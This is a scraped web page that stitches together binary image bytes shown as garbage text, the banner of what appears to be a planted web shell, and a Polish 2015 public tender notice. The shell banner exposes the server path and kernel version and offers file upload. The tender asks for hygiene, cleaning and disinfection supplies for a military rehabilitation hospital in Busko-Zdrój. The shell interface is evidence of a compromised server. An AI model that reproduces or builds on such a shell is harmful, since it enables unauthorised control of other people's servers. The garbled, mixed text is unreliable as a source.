JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150209/17359-N-2015.html

<p class="kh_header"><b>Busko-Zdrój: Dostawa środków do utrzymania higieny dla 21 Wojskowego Szpitala Uzdrowiskowo-Rehabilitacyjnego SP ZOZ w Busku-Zdroju</b><br>
<b>Numer ogłoszenia: 17359 - 2015; data zamieszczenia: 09.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 21 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ , ul. Gen. F. Rzewuskiego 8, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3780919, 3780348, faks 041 3780332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.21wszur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków do utrzymania higieny dla 21 Wojskowego Szpitala Uzdrowiskowo-Rehabilitacyjnego SP ZOZ w Busku-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są realizowane w częściach dostawy środków do utrzymania higieny do magazynu Zamawiającego przy ul. Rzewuskiego 8  28-100 Busko-Zdrój.
2. Przedmiot zamówienia został podzielony na części/pakiety w ramach tego postępowania:
1) PAKIET I 	- RĘCZNIKI PAPIEROWE I PAPIER TOALETOWY- zał. nr 1 do SIWZ;
2) PAKIET II  	- WORKI FOLIOWE - zał. nr 2 do SIWZ;
3) PAKIET III 	- DOZOWNIKI I MYDŁO W PIANIE - zał. nr 3 do SIWZ;
4) PAKIET IV 	- ŚRODKI MYJĄCE I CZYSZCZĄCE - zał. nr 4 do SIWZ;
5) PAKIET V 	- ARTYKUŁY CATERINGOWE - zał. nr 5 do SIWZ;
6) PAKIET VI 	- ŚRODKI DEZYNFEKCYJNE DO KUCHNI I RĄK - zał. nr 6 do SIWZ;
7) PAKIET VII 	- ŚRODKI UTRZYMANIA HIGIENY KUCHNI - zał. nr 7 do SIWZ;
8) PAKIET VIII 	- ŚRODKI DO MASZYNOWEGO MYCIA NACZYŃ - zał. nr 8 do SIWZ;
9) PAKIET IX 	- ŚRODKI DEZYNFEKCYJNE- zał. nr 9 do SIWZ;
10) PAKIET X 	- ŚRODKI OCHRONY INDYWIDUALNEJ - zał. nr 10 do SIWZ.
3. Wielkości przedmiotu zamówienia są wielkościami szacunkowymi opartymi na dotychczasowych potrzebach z roku ubiegłego i mogą ulec zmianie spowodowanej potrzebami Zamawiającego w okresie obowiązywania przyszłej umowy.
4. Zamawiający zastrzega sobie możliwość do zmiany limitów ilościowych zamawianych produktów w stosunku do określonych w poszczególnych pozycjach każdego z formularzy asortymentowo-cenowych, zarówno w in plus jak i in minus z zachowaniem ceny produktu zgodnie z ofertą.
5. Z uwagi na możliwe zmiany potrzeb, Zamawiający gwarantuje realizacje zamówienia na poziomie co najmniej 80% szacowanej wartości zamówienia objętego przedmiotem przyszłej umowy.
6. W ramach formularza asortymentowo-cenowego należy zaoferować wszystkie wymienione pozycje, wpisać nazwę handlową, wielkość opakowania oraz nazwę producenta zaoferowanego przez siebie produktu. Nie wypełnienie którejkolwiek pozycji będzie skutkowało odrzuceniem oferty.
7. Przedmiot zamówienia ma być dopuszczony do obrotu na podstawie obowiązujących przepisów prawa i odpowiadać wszelkim wymaganiom określonym przepisami prawa, wolny od jakichkolwiek wad fizycznych lub prawnych.
8. Wszystkie opakowania jednostkowe środków i preparatów muszą posiadać etykietę w języku polskim wraz z opisem i charakterystyką produktu.
9. Wykonawca zobowiązany będzie na czas realizacji umowy do:
1) nieodpłatnej dostawy, montażu i regulacji użyczonych systemów dozowania:
a) PAKIET VI - ŚRODKI DO DEZYNFEKCJI POWIERZCHNI KUCHENNYCH I RĄK:
- 1 szt. przepływowego dozownika dwu-funkcyjny z pianotwórczym systemem dozująco-myjącym zasilanym wodą, umożliwiającym precyzyjne dozowanie, właściwe dla stosowanych koncentratów, wyposażonym w wąż o długości 15 m oraz pistolet pianotwórczy wyposażony w funkcję płukania czystą wodą,
- 1 szt. dozownika pojedynczego (mieszalnika) na jeden rodzaj chemii z możliwością pobierania preparatu mieszanego z wodą w odpowiednim stężeniu,
b) PAKIET VII - ŚRODKI  DO UTRZYMANIA HIGIENY KUCHENNEJ:
- 1 sztuki zasilanego wodą wielofunkcyjnego systemu dozująco-myjącego, na dwa rodzaje chemii, do mycia i dezynfekcji przy niskim ciśnieniu wody. Automatycznie mieszającego i dozującego chemię w postaci piany lub rozpylanej cieczy, wyposażonego w funkcję  płukania czystą wodą.  System odporny na działanie związków chemicznych. Dozownik przystosowany do pracy w gastronomii według procedur HACCP, umożliwiający precyzyjne dozowanie, właściwe dla stosowanych koncentratów.  Wyposażony w wąż o długości 15 m oraz pistolet pianotwórczy, wyposażony w funkcję płukania czysta wodą,
- 1 sztuki dozownika (mieszalnika) pojedynczego na jeden rodzaj chemii z możliwością pobierania preparatu mieszanego z wodą w odpowiednim stężeniu, wyposażonego w system natychmiastowego odcinania zasilania oraz blokadę podawania wody oraz
- 3 pojedynczych dozowników (mieszalników) każdy na inny rodzaj chemii (zamontowanych w szeregu) z możliwością pobierania preparatu mieszanego z wodą w odpowiednim stężeniu,  wyposażony w system natychmiastowego odcinania zasilania oraz blokadę podawania wody,
c) PAKIET VIII - ŚRODKI DO MASZYNOWEGO MYCIA NACZYŃ:
- 1 sztuki dozownika  zewnętrznego do automatycznego podawania środków w odpowiednim stężeniu do zmywarki,
- 1 sztuki  dozownika  zewnętrznego do automatycznego dozowania środka nabłyszczającego do zmywarki;
2) serwisowania użyczonych systemów dozowania, przynajmniej raz na kwartał, potwierdzone protokołem.
10. Zamawiający na potwierdzenie że oferowane dostawy odpowiadają wymaganiom określonym  przez Zamawiającego, żąda
1) dokumentów potwierdzających zgodność oferowanego produktu z opisem przedmiotu zamówienia zgodnie z wymaganiami określonymi w każdym z PAKIET-ów - zał. 1-10  do SIWZ;
2) próbki (po jednej sztuce/opakowaniu) oferowanego produktu zgodnie z wymaganiami określonymi w każdym z PAKIET-ów - zał. 1-10  do SIWZ.
11. Szczegółowe warunki realizacji przedmiotu zamówienia zostały określone w projekcie umowy - zał. nr 15 do SIWZ. 
12. Zamawiający na etapie realizacji zamówienia nie dopuszcza możliwości samowolnej zmiany zaoferowanych produktów w złożonej ofercie za wyjątkiem:
1) zaprzestania produkcji produktów będących przedmiotem dostawy,
2) wycofania tych produktów z obrotu,
3) braku możliwości pozyskania produktów będących przedmiotem dostawy wskutek okoliczności, za które Wykonawca nie ponosi odpowiedzialności,
a na potwierdzenie tego, Wykonawca przedstawi dokument potwierdzający powyższe trudności z realizacją dostawy oraz  zaproponuje produkt równoważny w tej samej cenie, którego równoważność będzie przedmiotem oceny przez Zamawiającego. 
13. W przypadku złożonej uzasadnionej reklamacji przez Zamawiającego w zakresie braku skuteczności działania środka chemicznego zaoferowanego w ofercie, Wykonawca zobowiązany będzie do zaproponowania produktu równoważnego w tej samej cenie, którego poprawne działanie będzie przedmiotem oceny przez Zamawiającego.
14. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.76.00.00-5, 18.93.00.00-7, 39.83.17.00-3, 39.83.16.00-2, 39.22.20.00-4, 33.63.16.00-8, 39.83.12.30-7, 39.83.12.10-1, 36.60.00.00-6, 18.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna ten warunek za spełniony przez Wykonawcę jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 12 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna ten warunek za spełniony przez Wykonawcę jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 12 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna ten warunek za spełniony przez Wykonawcę jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 12 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna ten warunek za spełniony przez Wykonawcę jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 12 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna ten warunek za spełniony przez Wykonawcę jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 12 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia na podstawie art. 25 ust. 1 pkt 2 ustawy Pzp, że oferowane dostawy odpowiadają wymaganiom określonym  przez Zamawiającego złożą:
a) dokumenty potwierdzające zgodność oferowanego produktu z opisem przedmiotu zamówienia zgodnie z wymaganiami określonymi w każdym z PAKIET-ów  - zał. 1-10  do SIWZ;
b) próbki (po jednej sztuce/opakowaniu) oferowanego produktu zgodnie z wymaganiami określonymi w każdym z PAKIET-ów - zał. 1-10  do SIWZ;</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Pozacenowe - termin płatności faktury - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa na wykonanie zamówienia publicznego zostanie zawarta z Wykonawcą, który spełni wszystkie postawione wymagania i którego oferta zostanie wybrana jako najkorzystniejsza.
2. Umowa na podstawie złożonej oferty Wykonawcy, zostanie zawarta według załączonego projektu umowy - zał. nr 15 do niniejszej SIWZ.
3. Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający przewiduje następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1) w zakresie wartości przedmiotu zamówienia: 
a) ustawowej zmiany stawki podatku  VAT w ramach niniejszej umowy - zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę VAT,
b) w razie zaistnienia okoliczności określonej w art. 145 ustawy Pzp;
2) w zakresie terminu realizacji zamówienia:
a) w sytuacji niemożności realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, uznanych na piśmie przez Zamawiającego,
b) w razie trzykrotnie składanej reklamacji przez Zamawiającego,
c) w razie zaistnienia okoliczności określonej w art. 145 ustawy Pzp;
3) w zakresie zmian:
a) w strukturze organizacyjnej Wykonawcy lub Zamawiającego dotyczące określonych w umowie nazw, adresów,
b) osób reprezentujących strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://21wszur.tbu.pl/bip/przetargi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 21 WSzU-R SP ZOZ w Busku-Zdroju, ul Rzewuskiego 8, 28-100 Busko-Zdrój, budynek OPAL, piętro I, pokój nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2015 godzina 12:00, miejsce: - sekretariat 21 WSzU-R SP ZOZ w Busku-Zdroju, ul Rzewuskiego 8, 28-100 Busko-Zdrój, budynek AGAT, parter, pokój nr 405..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I 	- RĘCZNIKI PAPIEROWE I PAPIER TOALETOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET II  	- WORKI FOLIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET III 	- DOZOWNIKI I MYDŁO W PIANIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.17.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET IV 	- ŚRODKI MYJĄCE I CZYSZCZĄCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.16.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET V 	- ARTYKUŁY CATERINGOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 5 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET VI 	- ŚRODKI DEZYNFEKCYJNE DO KUCHNI I RĄK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 6 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET VII 	- ŚRODKI UTRZYMANIA HIGIENY KUCHNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.30-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
